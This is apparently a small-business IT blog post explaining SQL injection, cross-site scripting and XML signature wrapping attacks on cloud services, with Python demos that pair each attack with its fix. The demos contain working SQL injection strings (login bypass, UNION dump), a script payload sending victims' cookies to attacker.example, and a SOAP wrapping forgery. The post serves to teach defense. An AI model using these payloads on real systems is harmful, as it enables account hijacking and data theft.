Malware Injection Attacks

The Types of Malware Injection Attacks

Cloud computing infrastructure is susceptible to malware injection attacks. In these attacks, the cyber attacker creates a malicious application or service instance and injects it into the SaaS, PaaS or IaaS layer. Once the injection is complete, the malicious module runs as if it were one of the valid instances in the cloud infrastructure, and requests can be routed to it. From this point, the cyber attacker can launch any number of further attacks, such as covert eavesdropping, data manipulation and data theft.

It is important to note that, of all the malware injection attacks, the SQL injection attack and the cross-site scripting (XSS) attack are the two most common forms launched against cloud computing infrastructure.

The SQL Injection Attack

SQL injection is a type of malware injection attack that targets the database servers in the cloud infrastructure that sit behind vulnerable web applications. The cyber attacker exploits an application that builds SQL statements from user input without validating or parameterizing it, and injects SQL of their own in order to bypass the login check and gain unauthorized access to the backend databases.

If this is successful, the cyber attacker can then read or manipulate the contents of the databases, retrieve confidential data and, depending on the privileges of the database account, execute operating system commands or take control of the web server for further criminal activity. SQL injection attacks can also be launched at scale by a botnet.
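The login bypass and data retrieval described above, shown as an added example that is not from the original post. It uses Python's built-in sqlite3 module against a constructed in-memory user table; the table, user names, passwords and attacker inputs are all made up for the demo. The first login function concatenates user input into the SQL statement, the second binds it as a parameter, and the same attacker strings are fed to both:

```python
import sqlite3


def make_db():
    """Constructed in-memory user table standing in for the backend database."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the statement by concatenation, so input is parsed as SQL rather than data."""
    sql = (
        "SELECT username, role FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(sql).fetchall()


def login_parameterized(conn, username, password):
    """Same query with bound parameters: the driver keeps the values out of the statement text."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# Constructed attacker inputs.
BYPASS_USER = "alice'--"                 # the -- comment discards the password check
BYPASS_PASS = "' OR '1'='1"              # turns the WHERE clause into a tautology
DUMP_USER = "x' UNION SELECT username, password FROM users--"  # reads other columns


def demo():
    """Runs each attacker string through both login functions and collects the rows returned."""
    conn = make_db()
    return {
        "comment_bypass": login_vulnerable(conn, BYPASS_USER, "wrong"),
        "tautology_bypass": login_vulnerable(conn, "bob", BYPASS_PASS),
        "union_dump": login_vulnerable(conn, DUMP_USER, "wrong"),
        "param_comment": login_parameterized(conn, BYPASS_USER, "wrong"),
        "param_tautology": login_parameterized(conn, "bob", BYPASS_PASS),
        "param_valid": login_parameterized(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

Against the concatenated query, the comment payload logs in as the admin without a password, the tautology payload returns every row, and the UNION payload returns the password column; the parameterized query returns nothing for all three and still accepts the genuine credentials.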

For example, the Asprox botnet used roughly a thousand bots equipped with an SQL injection kit to carry out a mass SQL injection campaign (SOURCE: 1). The bots first queried Google to find web servers running the ASP.NET framework, and then sent encoded SQL queries containing the exploit payload to those servers.

The bots executed the SQL injection attack against every web site returned by those searches. In the end, over 6 million URLs belonging to 153,000 different web sites hosted on various cloud infrastructures were affected by the Asprox botnet.

Cross Site Scripting (XSS)

Cross-site scripting attacks are a type of malware injection attack in which the cyber attacker injects malicious script or markup, such as JavaScript, VBScript, ActiveX, HTML or Flash content, into a vulnerable dynamic web page so that it executes in the victim's web browser. From there the cyber attacker can steal the session cookie that identifies the victim to the application and use it to access the victim's account, or trick the victim into clicking a malicious link.
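A reflected XSS of the kind described above, as an added example that is not part of the original post. The page template, the search URL, the host names (shop.example, attacker.example) and the cookie-stealing payload are all constructed for the demo. The vulnerable renderer copies the query parameter straight into the HTML; the hardened one output-encodes it with the standard library's html.escape, and a Set-Cookie helper shows the HttpOnly flag that keeps a script from reading the session cookie even when an injection does succeed:

```python
import html
from urllib.parse import parse_qs, quote, urlparse

# Constructed page template; {term} is reflected from the q= query parameter.
TEMPLATE = "<html><body><h1>Results for: {term}</h1></body></html>"


def search_term(url):
    """Pulls the q= parameter out of a request URL (empty string if absent)."""
    return parse_qs(urlparse(url).query).get("q", [""])[0]


def render_vulnerable(url):
    """Reflects the parameter verbatim: markup in the input becomes markup in the page."""
    return TEMPLATE.format(term=search_term(url))


def render_escaped(url):
    """Output-encodes the parameter so the browser renders it as text, not as HTML."""
    return TEMPLATE.format(term=html.escape(search_term(url), quote=True))


def contains_script_element(page):
    """Crude check for this demo only: does a <script> tag survive into the HTML?"""
    return "<script" in page.lower()


def session_cookie_header(value):
    """HttpOnly keeps document.cookie from exposing the session id even if a script runs."""
    return f"Set-Cookie: session={value}; Secure; HttpOnly; SameSite=Lax"


# Constructed payload: sends the victim's cookies to an attacker-controlled host.
PAYLOAD = "<script>new Image().src='https://attacker.example/c?'+document.cookie</script>"
ATTACK_URL = "https://shop.example/search?q=" + quote(PAYLOAD)


if __name__ == "__main__":
    print(render_vulnerable(ATTACK_URL))   # live <script> element in the page
    print(render_escaped(ATTACK_URL))      # &lt;script&gt;... shown as text
    print(session_cookie_header("abc123"))
```

The attacker delivers ATTACK_URL to the victim (the "malicious link" above); in the vulnerable page the script runs in the victim's origin and can read any cookie that is not HttpOnly.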

For example, cyber researchers in Germany demonstrated an XSS attack against the Amazon AWS cloud computing platform in 2011. A vulnerability in the Amazon store allowed the team to hijack an AWS session and gain access to all of the customer's data, including authentication data, tokens and plain text passwords (SOURCE: 2).

The Wrapping Attack

Wrapping attacks are a type of malware injection that use XML signature wrapping (also called XML rewriting) to exploit a weakness in how web servers validate signed requests. The attack is carried out on SOAP messages in transit between a legitimate user and the web server.

The cyber attacker embeds a bogus element (the wrapper) into the message structure, moves the original, signed message body under the wrapper, and puts a new body containing malicious content in its place. The modified message is then sent to the server hosted on the cloud computing infrastructure.

Since the original message body is unchanged and its signature still verifies, the server is tricked into accepting a message that has in fact been altered, and it processes the attacker's body instead of the signed one. As a result, the cyber attacker gains unauthorized access to protected resources, and illegal operations can proceed from there.
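The wrapping described above, as an added example that is not from the original post or from any real SOAP stack. It uses a deliberately simplified stand-in for XML Signature: the "digest" is a SHA-256 over the ElementTree serialization of the referenced element, with no canonicalization and no key, which is enough to show where the validation logic goes wrong. The operation names and the Id attribute are constructed for the demo. The vulnerable server resolves the signature Reference by Id anywhere in the document and then acts on whatever sits at Envelope/Body; the hardened server acts only on the exact element whose digest it verified:

```python
import copy
import hashlib
import xml.etree.ElementTree as ET

SOAP = "http://schemas.xmlsoap.org/soap/envelope/"
NS = {"soap": SOAP}
ET.register_namespace("soap", SOAP)


def digest(elem):
    """Simplified stand-in for an XML-DSig reference digest (no real C14N, no key)."""
    return hashlib.sha256(ET.tostring(elem, encoding="utf-8")).hexdigest()


def build_signed_request(operation):
    """Legitimate client: Body carries Id="body", the Header holds a Reference to it."""
    env = ET.Element(f"{{{SOAP}}}Envelope")
    header = ET.SubElement(env, f"{{{SOAP}}}Header")
    body = ET.SubElement(env, f"{{{SOAP}}}Body", {"Id": "body"})
    ET.SubElement(body, operation)
    sig = ET.SubElement(header, "Signature")
    ref = ET.SubElement(sig, "Reference", {"URI": "#body"})
    ET.SubElement(ref, "DigestValue").text = digest(body)
    return env


def wrap(env, malicious_operation):
    """Attacker: keep the signed Body (its digest still matches) but move it into a
    Wrapper element under the Header, and put an unsigned Body in its place."""
    forged = copy.deepcopy(env)
    header = forged.find("soap:Header", NS)
    original_body = forged.find("soap:Body", NS)
    forged.remove(original_body)
    wrapper = ET.SubElement(header, "Wrapper")
    wrapper.append(original_body)                       # still carries Id="body"
    new_body = ET.SubElement(forged, f"{{{SOAP}}}Body")  # no Id, never signed
    ET.SubElement(new_body, malicious_operation)
    return forged


def verify_signature(env):
    """Resolves the Reference by Id anywhere in the document, as a naive verifier does.
    Returns (digest_ok, element_that_was_verified)."""
    ref = env.find("soap:Header/Signature/Reference", NS)
    target_id = ref.get("URI")[1:]
    signed = env.find(f".//*[@Id='{target_id}']")
    expected = ref.find("DigestValue").text
    return signed is not None and digest(signed) == expected, signed


def process_vulnerable(env):
    """Verifies the signature, then processes whatever element sits at Envelope/Body."""
    ok, _ = verify_signature(env)
    if not ok:
        raise ValueError("signature invalid")
    return env.find("soap:Body", NS)[0].tag


def process_hardened(env):
    """Same check, plus: the element acted on must be the element that was verified."""
    ok, signed = verify_signature(env)
    body = env.find("soap:Body", NS)
    if not ok or signed is not body:
        raise ValueError("signed element is not the SOAP Body being processed")
    return body[0].tag


def accepts(processor, env):
    """True if the processor accepts the message, False if it rejects it."""
    try:
        processor(env)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    legit = build_signed_request("DescribeInstances")
    forged = wrap(legit, "TerminateInstances")
    print("vulnerable server runs:", process_vulnerable(forged))  # TerminateInstances
    print("hardened server accepts forged:", accepts(process_hardened, forged))  # False
```

The digest over the wrapped original still matches, so a verifier that only asks "does some element with this Id have the right digest?" says yes; the fix is to tie the verified element to the element the application consumes (here by object identity, in a real stack by checking the signed element's position in the document).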

Since cloud users normally request services from cloud providers through web service interfaces that accept such signed messages, wrapping attacks can damage cloud systems as well. Amazon's EC2 was found to be vulnerable to wrapping attacks in 2008 (SOURCE: 3).

The research showed that EC2 had a weakness in its SOAP message security validation mechanism. A signed SOAP request from a legitimate user could be intercepted and modified, after which the cyber attacker could perform unauthorized actions on the victim's account in the cloud environment.

Using the same XML signature wrapping technique, the cyber researchers also demonstrated an account hijacking attack that exploited a vulnerability in Amazon AWS (SOURCE: 4). By altering authorized, digitally signed SOAP messages, they were able to obtain unauthorized access to a customer's account, delete existing and create new images in the customer's EC2 account, and perform other administrative tasks.

Conclusions

Now that you’ve learned about malware injection attacks our next blog will examine other types of threat variants to a Cloud Infrastructure.

Sources

  1. N. Provos, M. A. Rajab, and P. Mavrommatis, "Cybercrime 2.0: When the Cloud Turns Dark," Communications of the ACM, Vol. 52, No. 4, pp. 42–47, 2009.
  2. "Researchers Demo Cloud Security Issue With Amazon AWS Attack," PC World, October 2011. http://www.pcworld.idg.com.au/article/405419/researchers_demo_cloud_security_issue_amazon_aws_attack/
  3. N. Gruschka and L. L. Iacono, "Vulnerable Cloud: SOAP Message Security Validation Revisited," IEEE International Conference on Web Services, Los Angeles, 2009.
  4. "Researchers Demo Cloud Security Issue With Amazon AWS Attack," PC World, October 2011. http://www.pcworld.idg.com.au/article/405419/researchers_demo_cloud_security_issue_amazon_aws_attack/

About Chad Lauterbach

CEO at Be Structured Technology Group, Inc., a Los Angeles-based provider of managed IT services for small business. I desire to help small businesses better utilize technology by assisting in high-level planning to make sure that new systems will benefit them both operationally and financially. I am careful to implement and support systems using industry best practices.